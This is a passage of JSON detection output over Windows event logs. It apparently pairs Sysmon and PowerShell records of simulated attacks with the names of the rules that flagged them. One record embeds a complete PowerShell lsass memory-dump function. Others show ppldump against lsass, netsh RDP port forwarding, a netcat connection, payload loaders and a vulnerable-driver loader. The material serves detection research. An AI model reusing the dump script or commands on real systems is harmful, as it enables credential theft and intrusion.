ScriptBlock"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"MessageNumber":1,"MessageTotal":1,"Path":"C:\\Users\\Public\\lsass_wer_ps.ps1","ScriptBlockId":"27f08bda-c330-419f-b83b-eb5c0f699930","ScriptBlockText":"function Memory($path)\r\n{\r\n\t\t\t \r\n\t\t\t \r\n\t\t$Process = Get-Process lsass\r\n\t\t$DumpFilePath = $path\r\n\t\t\r\n\t\t$WER = [PSObject].Assembly.GetType('System.Management.Automation.WindowsErrorReporting')\r\n\t\t$WERNativeMethods = $WER.GetNestedType('NativeMethods', 'NonPublic')\r\n\t\t$Flags = [Reflection.BindingFlags] 'NonPublic, Static'\r\n\t\t$MiniDumpWriteDump = $WERNativeMethods.GetMethod('MiniDumpWriteDump', $Flags)\r\n\t\t$MiniDumpWithFullMemory = [UInt32] 2\r\n\t\r\n\t\t\t\r\n\t\t\t #\r\n\t\t$ProcessId = $Process.Id\r\n\t\t$ProcessName = $Process.Name\r\n\t\t$ProcessHandle = $Process.Handle\r\n\t\t$ProcessFileName = \"$($ProcessName).dmp\"\r\n\t\t\r\n\t\t$ProcessDumpPath = Join-Path $DumpFilePath $ProcessFileName\r\n\t\t\r\n\t\t$FileStream = New-Object IO.FileStream($ProcessDumpPath, [IO.FileMode]::Create)\r\n\t\t\t \r\n\t\t$Result = $MiniDumpWriteDump.Invoke($null, @($ProcessHandle,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t$ProcessId,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t$FileStream.SafeFileHandle,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t$MiniDumpWithFullMemory,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t[IntPtr]::Zero,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t[IntPtr]::Zero,\r\n\t\t\t\t\t\t\t\t\t\t\t\t\t[IntPtr]::Zero))\r\n\t\t\t \r\n\t\t$FileStream.Close()\r\n\t\t\r\n\t\tif (-not $Result)\r\n\t\t{\r\n\t\t\t$Exception = New-Object ComponentModel.Win32Exception\r\n\t\t\t$ExceptionMessage = \"$($Exception.Message) ($($ProcessName):$($ProcessId))\"\r\n\t\t\t\r\n\t\t\t# Remove any partially written dump files. For example, a partial dump will be written\r\n\t\t\t# in the case when 32-bit PowerShell tries to dump a 64-bit process.\r\n\t\t\tRemove-Item $ProcessDumpPath -ErrorAction SilentlyContinue\r\n\t\t\t\r\n\t\t\tthrow $ExceptionMessage\r\n\t\t}\r\n\t\telse\r\n\t\t{\r\n\t\t\t\"Memdump complete!\"\r\n\t\t}\r\n\t\r\n}"},"System":{"Channel":"Microsoft-Windows-PowerShell/Operational","Computer":"MSEDGEWIN10","Correlation":{"#attributes":{"ActivityID":"4AA5EAE3-4F33-0001-3A2B-A64A334FD601"}},"EventID":4104,"EventRecordID":971,"Execution":{"#attributes":{"ProcessID":7008,"ThreadID":6488}},"Keywords":"0x0","Level":3,"Opcode":15,"Provider":{"#attributes":{"Guid":"A0C1853B-5C40-4B15-8766-3CF1C58F985A","Name":"Microsoft-Windows-PowerShell"}},"Security":{"#attributes":{"UserID":"S-1-5-21-3461203602-4096304019-2269080069-1000"}},"Task":2,"TimeCreated":{"#attributes":{"SystemTime":"2020-06-30T14:24:08.254605Z"}},"Version":1}}}},{"detection":["(Built-in Logic) - System log was cleared"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"System":{"Channel":"System","Computer":"01566s-win16-ir.threebeesco.com","Correlation":null,"EventID":104,"EventRecordID":63220,"Execution":{"#attributes":{"ProcessID":264,"ThreadID":644}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"{fc65ddd8-d6ef-4962-83d5-6e5cfe9ce148}","Name":"Microsoft-Windows-Eventlog"}},"Security":{"#attributes":{"UserID":"S-1-5-21-308926384-506822093-3341789130-1106"}},"Task":104,"TimeCreated":{"#attributes":{"SystemTime":"2020-09-15T19:28:31.453647Z"}},"Version":0},"UserData":{"LogFileCleared":{"#attributes":{"xmlns":"http://manifests.microsoft.com/win/2004/08/windows/eventlog"},"BackupPath":"","Channel":"System","SubjectDomainName":"3B","SubjectUserName":"a-jbrown"}}}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"ppldump.exe -p lsass.exe -o a.png","Company":"?","CurrentDirectory":"c:\\Users\\Public\\BYOV\\ZAM64\\","Description":"?","FileVersion":"?","Hashes":"SHA1=C8BBBB2554D7C1F29B8670A14BE4E52D7AF81A24,MD5=DD7D6D8101A6412ABFA7B55F10E1D31B,SHA256=70908F9BBC59198FEBE0D1CA0E34A9E79C68F5053A39A0BA0C6F6CEC9ED1A875,IMPHASH=0EFF65F1D3AC0A58787724FB03E2D1BC","Image":"C:\\Users\\Public\\BYOV\\ZAM64\\ppldump.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-21D2-5E41-0000-002034770900","LogonId":"0x97734","OriginalFileName":"?","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-27FE-5E41-0000-0010DD653800","ParentProcessId":4236,"ProcessGuid":"747F3D96-2B98-5E41-0000-00109C904700","ProcessId":5016,"Product":"?","RuleName":"suspicious execution path","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-02-10 10:08:24.525"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":20012,"Execution":{"#attributes":{"ProcessID":2728,"ThreadID":3456}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-02-10T10:08:24.535095Z"}},"Version":5}}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"chost.exe payload.bin","Company":"?","CurrentDirectory":"C:\\Users\\Public\\tools\\evasion\\","Description":"?","FileVersion":"?","Hashes":"SHA1=06A1D9CC580F1CC239E643302CAB9166E0DF6355,MD5=7724B90C1D66AB3FA2A781E344AD2BE5,SHA256=805CA4E5A08C2366923D46680FDFBAD8C3012AB6A93D518624C377FA8A610A43,IMPHASH=A4DE9CE85347166ACB42B7FA4676BF25","Image":"C:\\Users\\Public\\tools\\evasion\\chost.exe","IntegrityLevel":"High","LogonGuid":"00247C92-8E79-5EFD-0000-0020B446E837","LogonId":"0x37e846b4","OriginalFileName":"?","ParentCommandLine":"\"C:\\windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"00247C92-1117-5EFE-0000-001025004E3A","ParentProcessId":30572,"ProcessGuid":"00247C92-20BD-5EFE-0000-00106D029D3A","ProcessId":16900,"Product":"?","RuleName":"suspicious execution path","TerminalSessionId":7,"User":"LAPTOP-JU4M3I0E\\bouss","UtcTime":"2020-07-02 18:00:29.612"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":1,"EventRecordID":2116720,"Execution":{"#attributes":{"ProcessID":5320,"ThreadID":6908}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-02T18:00:29.615842Z"}},"Version":5}}}},{"detection":["Conhost Parent Process Executions"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"notepad","Company":"Microsoft Corporation","CurrentDirectory":"C:\\windows\\","Description":"Notepad","FileVersion":"10.0.18362.693 (WinBuild.160101.0800)","Hashes":"SHA1=C401CD335BA6A3BDAF8799FDC09CDC0721F06015,MD5=06E6C0482562459ADB462CA9008262F8,SHA256=E5D90BEEB6F13F4613C3153DABBD1466F4A062B7252D931F37210907A7F914F7,IMPHASH=E2D17AC7541817AA681AE8FF7734AD89","Image":"C:\\Windows\\System32\\notepad.exe","IntegrityLevel":"High","LogonGuid":"00247C92-8E79-5EFD-0000-0020B446E837","LogonId":"0x37e846b4","OriginalFileName":"NOTEPAD.EXE","ParentCommandLine":"\\??\\C:\\windows\\system32\\conhost.exe 0xffffffff -ForceV1","ParentImage":"C:\\Windows\\System32\\conhost.exe","ParentProcessGuid":"00247C92-1117-5EFE-0000-00105A024E3A","ParentProcessId":29168,"ProcessGuid":"00247C92-20BD-5EFE-0000-00105C059D3A","ProcessId":16788,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":7,"User":"LAPTOP-JU4M3I0E\\bouss","UtcTime":"2020-07-02 18:00:29.642"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"LAPTOP-JU4M3I0E","Correlation":null,"EventID":1,"EventRecordID":2116722,"Execution":{"#attributes":{"ProcessID":5320,"ThreadID":6908}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-02T18:00:29.650400Z"}},"Version":5}}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"spooler.exe payload.bin","Company":"?","CurrentDirectory":"c:\\Users\\Public\\tools\\cinj\\","Description":"?","FileVersion":"?","Hashes":"SHA1=68044D72A9FF02839E0164AEB8DFF1EB9B88A94B,MD5=508317C4844B1D2945713CC909D6431D,SHA256=0EB4AFA7216C4BC5E313ECA3EBAF0BD59B90EFF77A246AEF78491AA4FC619A17,IMPHASH=620745A90090718A46AC492610FE8EB4","Image":"C:\\Users\\Public\\tools\\cinj\\spooler.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-1CE4-5EFE-0000-00208F9C0800","LogonId":"0x89c8f","OriginalFileName":"?","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-1E44-5EFE-0000-001096443700","ParentProcessId":1140,"ProcessGuid":"747F3D96-1EA9-5EFE-0000-0010B1F13D00","ProcessId":6892,"Product":"?","RuleName":"suspicious execution path","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-07-02 17:51:37.815"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":304593,"Execution":{"#attributes":{"ProcessID":3324,"ThreadID":4016}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-07-02T17:51:37.819891Z"}},"Version":5}}}},{"detection":["Netsh Port Forwarding","Netsh RDP Port Forwarding"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"netsh I p a v l=8001 listena=1.2.3.4 connectp=3389 c=1.2.3.5","Company":"Microsoft Corporation","CurrentDirectory":"c:\\","Description":"Network Command Shell","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=7DA1852DF83C58841AD35248AD2A20D7FFBB7FA0,MD5=784A50A6A09C25F011C3143DDD68E729,SHA256=661F5D4CE4F0A6CB32669A43CE5DEEC6D5A9E19B2387F22C5012405E92169943,IMPHASH=33B8120C37D7861778989FBFD16214E1","Image":"C:\\Windows\\System32\\netsh.exe","IntegrityLevel":"High","LogonGuid":"365ABB72-CE6C-5CE6-0000-002047F30000","LogonId":"0xf347","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"365ABB72-DC3E-5CE6-0000-00102BC97200","ParentProcessId":712,"ProcessGuid":"365ABB72-DC5C-5CE6-0000-001066E27200","ProcessId":4088,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":1,"User":"IEWIN7\\IEUser","UtcTime":"2019-05-23 17:46:04.651"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":1026,"Execution":{"#attributes":{"ProcessID":2032,"ThreadID":2092}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-23T17:46:04.671625Z"}},"Version":5}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"1.2.3.5/3389","EventType":"SetValue","Image":"C:\\Windows\\system32\\netsh.exe","ProcessGuid":"365ABB72-DC5C-5CE6-0000-001066E27200","ProcessId":4088,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\PortProxy\\v4tov4\\tcp\\1.2.3.4/8001","UtcTime":"2019-05-23 17:46:05.022"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":1027,"Execution":{"#attributes":{"ProcessID":2032,"ThreadID":2092}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-23T17:46:05.022129Z"}},"Version":2}}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"nc.exe 127.0.0.1 1337","Company":"?","CurrentDirectory":"C:\\Users\\Public\\Tools\\","Description":"?","FileVersion":"?","Hashes":"SHA1=08664F5C3E07862AB9B531848AC92D08C8C6BA5A,MD5=E0DB1D3D47E312EF62E5B0C74DCEAFE5,SHA256=B3B207DFAB2F429CC352BA125BE32A0CAE69FE4BF8563AB7D0128BBA8C57A71C,IMPHASH=98CE7B6533CBD67993E36DAFB4E95946","Image":"C:\\Users\\Public\\Tools\\nc.exe","IntegrityLevel":"Medium","LogonGuid":"747F3D96-9DC3-5E75-0000-00205F930200","LogonId":"0x2935f","OriginalFileName":"?","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-9E06-5E75-0000-00107D541000","ParentProcessId":6088,"ProcessGuid":"747F3D96-9F77-5E75-0000-0010D2E62000","ProcessId":3364,"Product":"?","RuleName":"suspicious execution path","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-03-21 05:00:39.222"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":243567,"Execution":{"#attributes":{"ProcessID":2860,"ThreadID":3508}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-03-21T05:00:39.226538Z"}},"Version":5}}}},{"detection":["Whoami Execution","Local Accounts Discovery"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"whoami","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"whoami - displays logged on user information","FileVersion":"10.0.17763.1 (WinBuild.160101.0800)","Hashes":"SHA1=47D7864D26FC67E0D60391CBF170D33DA518C322,MD5=43C2D3293AD939241DF61B3630A9D3B6,SHA256=1D5491E3C468EE4B4EF6EDFF4BBC7D06EE83180F6F0B1576763EA2EFE049493A,IMPHASH=7FF0758B766F747CE57DFAC70743FB88","Image":"C:\\Windows\\System32\\whoami.exe","IntegrityLevel":"System","LogonGuid":"747F3D96-9DBA-5E75-0000-0020E7030000","LogonId":"0x3e7","OriginalFileName":"whoami.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\"","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-9F77-5E75-0000-001090F32000","ParentProcessId":2416,"ProcessGuid":"747F3D96-9F7D-5E75-0000-00104E062100","ProcessId":2484,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2020-03-21 05:00:45.082"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":243570,"Execution":{"#attributes":{"ProcessID":2860,"ThreadID":3508}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-03-21T05:00:45.087155Z"}},"Version":5}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000002)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"365ABB72-8DBD-5CEA-0000-0010D75D0000","ProcessId":452,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\HxUpdateServiceInfo\\Start","UtcTime":"2019-05-26 04:01:42.565"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":4859,"Execution":{"#attributes":{"ProcessID":984,"ThreadID":2352}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-26T04:01:42.625851Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"\"C:\\Users\\IEUser\\Desktop\\info.rar\\jjs.exe\"","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"365ABB72-8DBD-5CEA-0000-0010D75D0000","ProcessId":452,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\services\\HxUpdateServiceInfo\\ImagePath","UtcTime":"2019-05-26 04:01:42.565"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":13,"EventRecordID":4860,"Execution":{"#attributes":{"ProcessID":984,"ThreadID":2352}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-26T04:01:42.645880Z"}},"Version":2}}}},{"detection":["Suspicious Svchost Process","Windows Processes Suspicious Parent Directory","Suspect Svchost Activity"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"C:\\Windows\\system32\\svchost.exe","Company":"Microsoft Corporation","CurrentDirectory":"C:\\Windows\\system32\\","Description":"Host Process for Windows Services","FileVersion":"6.1.7600.16385 (win7_rtm.090713-1255)","Hashes":"SHA1=4AF001B3C3816B860660CF2DE2C0FD3C1DFB4878,MD5=54A47F6B5E09A77E61649109C6A08866,SHA256=121118A0F5E0E8C933EFD28C9901E54E42792619A8A3A6D11E1F0025A7324BC2,IMPHASH=58E185299ECCA757FE68BA83A6495FDE","Image":"C:\\Windows\\System32\\svchost.exe","IntegrityLevel":"System","LogonGuid":"365ABB72-8DBD-5CEA-0000-0020E7030000","LogonId":"0x3e7","ParentCommandLine":"\"C:\\Users\\IEUser\\Desktop\\info.rar\\jjs.exe\"","ParentImage":"C:\\Users\\IEUser\\Desktop\\info.rar\\jjs.exe","ParentProcessGuid":"365ABB72-0FA6-5CEA-0000-0010FEC30A00","ParentProcessId":3884,"ProcessGuid":"365ABB72-0FA7-5CEA-0000-001064C60A00","ProcessId":3908,"Product":"Microsoft® Windows® Operating System","RuleName":"","TerminalSessionId":0,"User":"NT AUTHORITY\\SYSTEM","UtcTime":"2019-05-26 04:01:43.557"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"IEWIN7","Correlation":null,"EventID":1,"EventRecordID":4863,"Execution":{"#attributes":{"ProcessID":984,"ThreadID":2352}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2019-05-26T04:01:43.567204Z"}},"Version":5}}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CommandLine":"Furutaka.exe dummy2.sys","Company":"UG North","CurrentDirectory":"c:\\Users\\Public\\BYOV\\TDL\\","Description":"Turla Driver Loader","FileVersion":"1.1.5.1904","Hashes":"SHA1=68B26C16080D71013123C6DEE7B1AABC3D2857D0,MD5=B1B981CD8B111783B80F3C4E10086912,SHA256=37805CC7AE226647753ACA1A32D7106D804556A98E1A21AC324E5B880B9A04DA,IMPHASH=114E27FBB0E975697F2F9988DE884FA7","Image":"C:\\Users\\Public\\BYOV\\TDL\\Furutaka.exe","IntegrityLevel":"High","LogonGuid":"747F3D96-12FA-5E41-0000-0020171A0300","LogonId":"0x31a17","OriginalFileName":"Furutaka.exe","ParentCommandLine":"\"C:\\Windows\\system32\\cmd.exe\" ","ParentImage":"C:\\Windows\\System32\\cmd.exe","ParentProcessGuid":"747F3D96-1363-5E41-0000-0010356F1500","ParentProcessId":8864,"ProcessGuid":"747F3D96-141C-5E41-0000-0010788B1E00","ProcessId":3768,"Product":"TurlaDriverLoader","RuleName":"suspicious execution path","TerminalSessionId":1,"User":"MSEDGEWIN10\\IEUser","UtcTime":"2020-02-10 08:28:12.848"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":1,"EventRecordID":18762,"Execution":{"#attributes":{"ProcessID":2728,"ThreadID":3876}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":1,"TimeCreated":{"#attributes":{"SystemTime":"2020-02-10T08:28:12.856363Z"}},"Version":5}}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"CreationUtcTime":"2020-02-10 08:28:12.870","Image":"c:\\Users\\Public\\BYOV\\TDL\\Furutaka.exe","ProcessGuid":"747F3D96-141C-5E41-0000-0010788B1E00","ProcessId":3768,"RuleName":"","TargetFilename":"C:\\Windows\\System32\\drivers\\VBoxDrv.sys","UtcTime":"2020-02-10 08:28:12.870"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":11,"EventRecordID":18763,"Execution":{"#attributes":{"ProcessID":2728,"ThreadID":3876}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":11,"TimeCreated":{"#attributes":{"SystemTime":"2020-02-10T08:28:12.876766Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000003)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-12F2-5E41-0000-00101C510000","ProcessId":564,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\VBoxDrv\\Start","UtcTime":"2020-02-10 08:28:12.870"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":18764,"Execution":{"#attributes":{"ProcessID":2728,"ThreadID":3876}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-02-10T08:28:12.888628Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"\\??\\C:\\Windows\\system32\\drivers\\VBoxDrv.sys","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-12F2-5E41-0000-00101C510000","ProcessId":564,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\VBoxDrv\\ImagePath","UtcTime":"2020-02-10 08:28:12.870"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":18765,"Execution":{"#attributes":{"ProcessID":2728,"ThreadID":3876}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-02-10T08:28:12.899736Z"}},"Version":2}}}},{"detection":["Registry Entries For Azorult Malware"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Details":"DWORD (0x00000004)","EventType":"SetValue","Image":"C:\\Windows\\system32\\services.exe","ProcessGuid":"747F3D96-12F2-5E41-0000-00101C510000","ProcessId":564,"RuleName":"","TargetObject":"HKLM\\System\\CurrentControlSet\\Services\\VBoxDrv\\Start","UtcTime":"2020-02-10 08:28:13.062"},"System":{"Channel":"Microsoft-Windows-Sysmon/Operational","Computer":"MSEDGEWIN10","Correlation":null,"EventID":13,"EventRecordID":18767,"Execution":{"#attributes":{"ProcessID":2728,"ThreadID":3876}},"Keywords":"0x8000000000000000","Level":4,"Opcode":0,"Provider":{"#attributes":{"Guid":"5770385F-C22A-43E0-BF4C-06F5698FFBD9","Name":"Microsoft-Windows-Sysmon"}},"Security":{"#attributes":{"UserID":"S-1-5-18"}},"Task":13,"TimeCreated":{"#attributes":{"SystemTime":"2020-02-10T08:28:13.091460Z"}},"Version":2}}}},{"detection":["Execution from Suspicious Folder","Suspicious Program Location with Network Connections"],"event":{"Event":{"#attributes":{"xmlns":"http://schemas.microsoft.com/win/2004/08/events/event"},"EventData":{"Company":"Microsoft Corporation","Description":"NT Kernel & System","FileVersion":"10.0.17763.973 (WinBuild.160101.0800)","Hashes":"SHA1=667AFD98C8BAA2CF95C9EE087CB36A0F6508A942,MD5=0EED97AD8D855B5EDF948A7866D5F874,SHA256=C36A8FAC48690632731D56747CBBDCE2453D3E5303A73896505D495F7678DFF0,IMPHASH=4D717BA02FC8AA76777B033C52AA4694","Image":"C:\\Users\\Public\\BYOV\\TDL\\Furutaka.exe","ImageLoaded":"C:\\Windows\\System32\\ntoskrnl.exe","OriginalFileName":"ntkrnlmp.exe","ProcessGuid":"747F3D96-141C-5E41-0000-0010788B1E00","ProcessId":3768,"Product":"Microsoft® Windows® Operating System","RuleName":"Supicious image loaded - ntoskrnl","Signature":"Microsoft 